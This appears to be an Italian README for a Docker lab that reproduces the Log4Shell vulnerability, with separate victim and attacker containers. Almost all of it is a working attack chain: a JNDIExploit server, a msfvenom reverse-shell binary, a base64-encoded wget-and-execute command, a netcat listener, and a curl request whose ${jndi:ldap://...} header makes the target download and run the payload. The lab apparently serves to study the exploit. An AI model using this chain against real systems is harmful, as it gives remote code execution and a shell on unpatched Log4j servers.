
Log4Shell Docker Env
IP della macchina vittima: 47.47.47.47
IP della macchina attaccante: 48.48.48.48
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack
Preparazione dell'ambiente della macchina attaccante
Esegui i comandi in tre shell diverse, assicurandoti che le shell rimangano attive
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
docker exec -it attack /bin/bash
python3 -m http.server 9999
docker exec -it attack /bin/bash
nc -lvvp 9000
Esecuzione dell'attacco dalla macchina attaccante
Esegui i comandi nella stessa shell
docker exec -it attack /bin/bash
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'
python3 command_gen.py vuln_ip attack_ip